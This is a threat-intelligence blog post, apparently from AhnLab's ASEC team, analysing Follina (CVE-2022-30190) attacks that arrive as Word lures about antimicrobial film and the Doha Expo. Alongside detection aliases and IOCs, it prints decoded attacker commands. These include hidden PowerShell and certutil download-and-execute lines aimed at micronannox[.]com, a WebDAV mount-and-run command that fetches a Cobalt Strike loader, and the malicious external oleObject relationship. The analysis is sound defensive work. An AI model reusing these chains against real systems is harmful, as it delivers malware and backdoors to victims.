Follina Vulnerability (CVE-2022-30190) Attack Using ‘Antimicrobial Film Request’ File

On June 7th, the ASEC analysis team swiftly uploaded a brief introduction of a zero-day vulnerability for Microsoft Office files (Follina). As the patch for the vulnerability is not distributed yet, users are advised to take caution.

AhnLab has distributed a detection rule for attack attempts exploiting the vulnerability from the perspectives of file and behavior detections. The vulnerability can be detected by various AhnLab products (V3, MDS, and EDR). While the team was monitoring such attack attempts, a distribution case targeting Korean users was found in the ASD (Ahnlab Smart Defense) infrastructure on June 7th. The log below is V3 Lite 4.0 and the attack distributed a file named ‘Antimicrobial Film Request 1-1.docx‘.

Figure 1. Vulnerability attack log collected by the ASD infrastructure

As the post mentioned above explains, the file runs a remote process using msdt.exe to exploit normal Windows programs Powershell.exe and CertUtil.exe, which are for downloading and decrypting encrypted scripts. It then uses Powershell.exe again to inject the shellcode into the currently running explorer.exe to perform malicious behaviors. The following part offers a more detailed explanation.

Figure 2. Command for running msdt.exe when the file with the vulnerability is opened

Opening a Word file named ‘Antimicrobial Film Request 1-1.docx‘ that is using the CVE-2022-30190 vulnerability executes a remote command as shown above.

// Part of decoded figure above
"c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell iwr -outf %tmp%\api.txt http://micronannox[.]com//b.txt & certutil -decode %tmp%\api.txt %tmp%\apis.ps1";
Start-Sleep 3;
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser & powershell %tmp%\apis.ps1

The following shows a brief execution process of the code run by the vulnerability.

  1. Powershell.exe saves hxxp://micronannox[.]com/b.txt as %tmp%api.txt.
  2. api.txt is decrypted as apis.ps1 using Certutil.exe.
  3. The decrypted apis.ps1 is executed after being imbued with properties for being hidden and running scripts.
  4. apis.ps1 injects the shellcode into the currently running explorer.exe. The injected shellcode downloads additional encrypted data from hxxp://micronannox[.]com/imei.omg to the C:\Users\Public\no1.png path and decrypts it with xor.
  5. The file that is ultimately decrypted is an executable that additionally downloads backdoor files.
Figure 3. Part of the code for apis.ps1

AhnLab products detect and block the Word files using the latest vulnerability with the following aliases.

V3 Behavior Detection

Figure 4. AhnLab V3 detecting the abnormal execution of msdt.exe

AhnLab EDR Detection

Figure 5. Detecting the abnormal execution of winword.exe -> msdt.exe

Figure 6. Detecting the abnormal execution of a suspicious powershell.exe

The detection log of the rule applied to detect files related to the vulnerability also discovered a file targeting the 2023 Doha Expo (VIP Invitation to Doha Expo 2023.docx) on June 2nd, which will be discussed below.

The file attempts to download data from the external URL connected to the internal document.xml.rels. To trick users, it uses the download URL related to the expo.

  • hxxps://files.attend-doha-expo[.]com/inv.html

Figures 7 and 8 show how the Word file is disguised as an invitation to the Doha Expo.

Figure 7. Word file attempting to connect the external URL upon being run

Figure 8. Word file

The analysis team discovered two Word files while monitoring detection logs. Each file’s URL existing in the external tag of document.xml.rels within the file is the same, but the tag placement is slightly changed.

<em><?xml version="1.0" encoding="UTF-8" standalone="yes"?></em>
(..omitted..)
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://files.attend-doha-expo[.]com/inv.html!" TargetMode="External" />
(..omitted..)
</Relationships>

The HTML file has a long annotation (AAA…) in the upper part just like the PoC code that was previously revealed. However, the lower part has a Base64-encoded powershell code. The figure below shows the decoded code.

The previous blog post mentioned the possibility of various attacks as the attackers can execute codes they intend to run. As for the HTML related to the Word file disguised as ‘2023 Doha Expo Invitation,’ there is a code that can download the payload of Cobalt Strike.

[Reference]

Figure 9. HTML file (inv.html) downloaded from an external URL
$cmd="C:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224[.]233\webdav\ /user:user `$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete ";

Until an official patch is released, you can apply a temporary measure by disabling the MSDT URL protocol.

AhnLab can detect the vulnerable file and its behaviors with the following aliases:

  • [File Alias]
    Exploit/HTML.CVE-2022-30190.S1841
    Exploit/XML.CVE-2022-30190.S1842
    Exploit/DOC.CVE-2022-30190
    Downloader/DOC.External
  • [Behavior Alias]
    Behavior/MDP.Event.M4313

[IOC]
hxxps://files.attend-doha-expo[.]com/inv.html
hxxp://micronannox[.]com/b.txt
hxxp://micronannox[.]com/imei.omg
hxxp://micronannox[.]com/slid.html
85829b792aa3a5768de66beacdb0a0ce
7c4ee39de1b67937a26c9bc1a7e5128b
4e7fc2acd66d87c7a439b49196899001
35a20a3ace9f59456a75f469186d2d19
963cc5bd71dc0412941bfc336100ec94
hxxp://5.206.224[.]233
hxxp://23.106.122[.]13

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

1 1 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments